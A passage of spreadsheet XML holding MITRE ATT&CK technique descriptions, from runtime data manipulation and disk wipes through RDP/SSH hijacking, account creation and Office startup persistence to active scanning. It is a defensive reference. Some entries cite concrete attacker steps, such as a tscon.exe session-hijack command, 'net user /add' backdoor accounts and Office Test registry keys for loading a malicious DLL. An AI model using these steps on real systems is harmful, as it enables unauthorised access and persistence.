Text storage sites are often used to host malicious code for C2 communication (e.g., [Stage Capabilities](https://attack.mitre.org/techniques/T1608)), but adversaries may also use these sites to exfiltrate collected data. Furthermore, paid features and encryption options may allow adversaries to conceal and store data more securely.(Citation: Pastebin EchoSec)
**Note:** This is distinct from [Exfiltration to Code Repository](https://attack.mitre.org/techniques/T1567/001), which highlight access to code repositories via APIs.</t>
  </si>
  <si>
    <t>T1565.003</t>
  </si>
  <si>
    <t>Data Manipulation: Runtime Data Manipulation</t>
  </si>
  <si>
    <t>Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.</t>
  </si>
  <si>
    <t>T1565.001</t>
  </si>
  <si>
    <t>Data Manipulation: Stored Data Manipulation</t>
  </si>
  <si>
    <t>Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.</t>
  </si>
  <si>
    <t>T1491.002</t>
  </si>
  <si>
    <t>Defacement: External Defacement</t>
  </si>
  <si>
    <t>An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. [External Defacement](https://attack.mitre.org/techniques/T1491/002) may ultimately cause users to distrust the systems and to question/discredit the system’s integrity. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement)</t>
  </si>
  <si>
    <t>T1491.001</t>
  </si>
  <si>
    <t>Defacement: Internal Defacement</t>
  </si>
  <si>
    <t>An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>T1561.001</t>
  </si>
  <si>
    <t>Disk Wipe: Disk Content Wipe</t>
  </si>
  <si>
    <t>Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.
Adversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have also been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files.
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>T1561.002</t>
  </si>
  <si>
    <t>Disk Wipe: Disk Structure Wipe</t>
  </si>
  <si>
    <t>Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. 
Adversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) if all sectors of a disk are wiped.
On a network devices, adversaries may reformat the file system using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `format`.(Citation: format_cmd_cisco)
To maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>T1566.004</t>
  </si>
  <si>
    <t>Phishing: Spearphishing Voice</t>
  </si>
  <si>
    <t>Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
All forms of phishing are electronically delivered social engineering. In this scenario, adversaries are not directly sending malware to a victim vice relying on [User Execution](https://attack.mitre.org/techniques/T1204) for delivery and execution. For example, victims may receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools ([Remote Access Software](https://attack.mitre.org/techniques/T1219)) onto their computer.(Citation: Unit42 Luna Moth)
Adversaries may also combine voice phishing with [Multi-Factor Authentication Request Generation](https://attack.mitre.org/techniques/T1621) in order to trick users into divulging MFA credentials or accepting authentication prompts.(Citation: Proofpoint Vishing)</t>
  </si>
  <si>
    <t>T1563.002</t>
  </si>
  <si>
    <t>Remote Service Session Hijacking: RDP Hijacking</t>
  </si>
  <si>
    <t>Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)
Adversaries may perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session. With System permissions and using Terminal Services Console, `c:\windows\system32\tscon.exe [session number to be stolen]`, an adversary can hijack a session without the need for credentials or prompts to the user.(Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions.(Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in red teaming tools.(Citation: Kali Redsnarf)</t>
  </si>
  <si>
    <t>T1563.001</t>
  </si>
  <si>
    <t>Remote Service Session Hijacking: SSH Hijacking</t>
  </si>
  <si>
    <t>Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
In order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent's socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial.(Citation: Slideshare Abusing SSH)(Citation: SSHjack Blackhat)(Citation: Clockwork SSH Agent Hijacking)(Citation: Breach Post-mortem SSH Hijack)
[SSH Hijacking](https://attack.mitre.org/techniques/T1563/001) differs from use of [SSH](https://attack.mitre.org/techniques/T1021/004) because it hijacks an existing SSH session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).</t>
  </si>
  <si>
    <t>T1021.007</t>
  </si>
  <si>
    <t>Remote Services: Cloud Services</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may log into accessible cloud services within a compromised environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078) that are synchronized with or federated to on-premises user identities. The adversary may then perform management actions or access cloud-hosted resources as the logged-on user. 
Many enterprises federate centrally managed user identities to cloud services, allowing users to login with their domain credentials in order to access the cloud control plane. Similarly, adversaries may connect to available cloud services through the web console or through the cloud command line interface (CLI) (e.g., [Cloud API](https://attack.mitre.org/techniques/T1059/009)), using commands such as &lt;code&gt;Connect-AZAccount&lt;/code&gt; for Azure PowerShell, &lt;code&gt;Connect-MgGraph&lt;/code&gt; for Microsoft Graph PowerShell, and &lt;code&gt;gcloud auth login&lt;/code&gt; for the Google Cloud CLI.
In some cases, adversaries may be able to authenticate to these services via [Application Access Token](https://attack.mitre.org/techniques/T1550/001) instead of a username and password. </t>
  </si>
  <si>
    <t>T1021.008</t>
  </si>
  <si>
    <t>Remote Services: Direct Cloud VM Connections</t>
  </si>
  <si>
    <t>Adversaries may leverage [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log directly into accessible cloud hosted compute infrastructure through cloud native methods. Many cloud providers offer interactive connections to virtual infrastructure that can be accessed through the [Cloud API](https://attack.mitre.org/techniques/T1059/009), such as Azure Serial Console(Citation: Azure Serial Console), AWS EC2 Instance Connect(Citation: EC2 Instance Connect)(Citation: lucr-3: Getting SaaS-y in the cloud), and AWS System Manager.(Citation: AWS System Manager).
Methods of authentication for these connections can include passwords, application access tokens, or SSH keys. These cloud native methods may, by default, allow for privileged access on the host with SYSTEM or root level access. 
Adversaries may utilize these cloud native methods to directly access virtual infrastructure and pivot through an environment.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console) These connections typically provide direct console access to the VM rather than the execution of scripts (i.e., [Cloud Administration Command](https://attack.mitre.org/techniques/T1651)).</t>
  </si>
  <si>
    <t>T1021.003</t>
  </si>
  <si>
    <t>Remote Services: Distributed Component Object Model</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.
The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)
Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)
Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). (Citation: MSDN WMI)</t>
  </si>
  <si>
    <t>T1021.001</t>
  </si>
  <si>
    <t>Remote Services: Remote Desktop Protocol</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) 
Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) or [Terminal Services DLL](https://attack.mitre.org/techniques/T1505/005) for Persistence.(Citation: Alperovitch Malware)</t>
  </si>
  <si>
    <t>T1021.004</t>
  </si>
  <si>
    <t>Remote Services: SSH</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.</t>
  </si>
  <si>
    <t>T1021.005</t>
  </si>
  <si>
    <t>Remote Services: VNC</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC).  VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
VNC differs from [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC.(Citation: MacOS VNC software for Remote Desktop)(Citation: VNC Authentication)
Adversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana authentication bug)</t>
  </si>
  <si>
    <t>T1021.006</t>
  </si>
  <si>
    <t>Remote Services: Windows Remote Management</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014) WinRM  can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).(Citation: MSDN WMI)</t>
  </si>
  <si>
    <t>T1136.003</t>
  </si>
  <si>
    <t>Create Account: Cloud Account</t>
  </si>
  <si>
    <t>Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.
Once an adversary has created a cloud account, they can then manipulate that account to ensure persistence and allow access to additional resources - for example, by adding [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) or assigning [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003).</t>
  </si>
  <si>
    <t>T1136.002</t>
  </si>
  <si>
    <t>Create Account: Domain Account</t>
  </si>
  <si>
    <t>Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the &lt;code&gt;net user /add /domain&lt;/code&gt; command can be used to create a domain account.
Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.</t>
  </si>
  <si>
    <t>T1136.001</t>
  </si>
  <si>
    <t>Create Account: Local Account</t>
  </si>
  <si>
    <t>Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. 
For example, with a sufficient level of access, the Windows &lt;code&gt;net user /add&lt;/code&gt; command can be used to create a local account. On macOS systems the &lt;code&gt;dscl -create&lt;/code&gt; command can be used to create a local account. Local accounts may also be added to network devices, often via common [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as &lt;code&gt;username&lt;/code&gt;, or to Kubernetes clusters using the `kubectl` utility.(Citation: cisco_username_cmd)(Citation: Kubernetes Service Accounts Security)
Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.</t>
  </si>
  <si>
    <t>T1137.006</t>
  </si>
  <si>
    <t>Office Application Startup: Add-ins</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins) There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018)
Add-ins can be used to obtain persistence because they can be set to execute code when an Office application starts. </t>
  </si>
  <si>
    <t>T1137.001</t>
  </si>
  <si>
    <t>Office Application Startup: Office Template Macros</t>
  </si>
  <si>
    <t>Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)
Office Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded.(Citation: enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates may also be stored and pulled from remote locations.(Citation: GlobalDotName Jun 2019) 
Word Normal.dotm location:&lt;br&gt;
&lt;code&gt;C:\Users\&amp;lt;username&amp;gt;\AppData\Roaming\Microsoft\Templates\Normal.dotm&lt;/code&gt;
Excel Personal.xlsb location:&lt;br&gt;
&lt;code&gt;C:\Users\&amp;lt;username&amp;gt;\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB&lt;/code&gt;
Adversaries may also change the location of the base template to point to their own by hijacking the application's search order, e.g. Word 2016 will first look for Normal.dotm under &lt;code&gt;C:\Program Files (x86)\Microsoft Office\root\Office16\&lt;/code&gt;, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.(Citation: GlobalDotName Jun 2019) 
An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.</t>
  </si>
  <si>
    <t>T1137.002</t>
  </si>
  <si>
    <t>Office Application Startup: Office Test</t>
  </si>
  <si>
    <t>Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
There exist user and global Registry keys for the Office Test feature:
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf&lt;/code&gt;
Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.</t>
  </si>
  <si>
    <t>T1137.003</t>
  </si>
  <si>
    <t>Office Application Startup: Outlook Forms</t>
  </si>
  <si>
    <t>Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
Once malicious forms have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SensePost Outlook Forms)</t>
  </si>
  <si>
    <t>T1137.004</t>
  </si>
  <si>
    <t>Office Application Startup: Outlook Home Page</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
Once malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page)
</t>
  </si>
  <si>
    <t>T1137.005</t>
  </si>
  <si>
    <t>Office Application Startup: Outlook Rules</t>
  </si>
  <si>
    <t>Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)</t>
  </si>
  <si>
    <t>T1505.001</t>
  </si>
  <si>
    <t>Server Software Component: SQL Stored Procedures</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted).
Adversaries may craft malicious stored procedures that can provide a persistence mechanism in SQL database servers.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019) To execute operating system commands through SQL syntax the adversary may have to enable additional functionality, such as xp_cmdshell for MSSQL Server.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019)(Citation: Microsoft xp_cmdshell 2017) 
Microsoft SQL Server can enable common language runtime (CLR) integration. With CLR integration enabled, application developers can write stored procedures using any .NET framework language (e.g. VB .NET, C#, etc.).(Citation: Microsoft CLR Integration 2017) Adversaries may craft or modify CLR assemblies that are linked to stored procedures since these CLR assemblies can be made to execute arbitrary commands.(Citation: NetSPI SQL Server CLR) </t>
  </si>
  <si>
    <t>T1505.002</t>
  </si>
  <si>
    <t>Server Software Component: Transport Agent</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.(Citation: Microsoft TransportAgent Jun 2016)(Citation: ESET LightNeuron May 2019) Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks. 
Adversaries may register a malicious transport agent to provide a persistence mechanism in Exchange Server that can be triggered by adversary-specified email events.(Citation: ESET LightNeuron May 2019) Though a malicious transport agent may be invoked for all emails passing through the Exchange transport pipeline, the agent can be configured to only carry out specific tasks in response to adversary defined criteria. For example, the transport agent may only carry out an action like copying in-transit attachments and saving them for later exfiltration if the recipient email address matches an entry on a list provided by the adversary. </t>
  </si>
  <si>
    <t>T1595.001</t>
  </si>
  <si>
    <t>Active Scanning: Scanning IP Blocks</t>
  </si>
  <si>
    <t>Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
Adversaries may scan IP blocks in order to [Gather Victim Network Information](https://attack.mitre.org/techniques/T1590), such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more nuanced scans that may reveal host software/versions via server banners or other network artifacts.(Citation: Botnet Scan) Information from these scans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[External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>T1595.002</t>
  </si>
  <si>
    <t>Active Scanning: Vulnerability Scanning</t>
  </si>
  <si>
    <t>Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
These scans may also include more broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning) Information from these scans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[Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).</t>
  </si>
  <si>
    <t>T1595.003</t>
  </si>
  <si>
    <t>Active Scanning: Wordlist Scanning</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may iteratively probe infrastructure using brute-forcing and crawling techniques. While this technique employs similar methods to [Brute Force](https://attack.mitre.org/techniques/T1110), its goal is the identification of content and infrastructure rather than the discovery of valid credentials. Wordlists used in these scans may contain generic, commonly used names and file extensions or terms specific to a particular software. Adversaries may also create custom, target-specific wordlists using data gathered from other Reconnaissance techniques (ex: [Gather Victim Org Information](https://attack.mitre.org/techniques/T1591), or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).
For example, adversaries may use web content discovery tools such as Dirb, DirBuster, and GoBuster and generic or custom wordlists to enumerate a website’s pages and directories.(Citation: ClearSky Lebanese Cedar Jan 2021) This can help them to discover old, vulnerable pages or hidden administrative portals that could become the target of further operations (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [Brute Force](https://attack.mitre.org/techniques/T1110)).  
As cloud storage solutions typically use globally unique names, adversaries may also use target-specific wordlists and tools such as s3recon and GCPBucketBrute to enumerate public and private buckets on cloud infrastructure.(Citation: S3Recon GitHub)(Citation: GCPBucketBrute) Once storage objects are discovered, adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530) to access valuable information that can be exfiltrated or used to escalate privileges and move laterally. </t>
  </si>
  <si>
    <t>T1592.004</t>
  </si>
  <si>
    <t>Gather Victim Host Information: Client Configurations</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the client configurations may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information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[Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>T1592.003</t>
  </si>
  <si>
    <t>Gather Victim Host Information: Firmware</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).(Citation: ArsTechnica Intel) Gathering this information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[Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).</t>
  </si>
  <si>
    <t>T1592.001</t>
  </si>
  <si>
    <t>Gather Victim Host Information: Hardware</t>
  </si>
  <si>
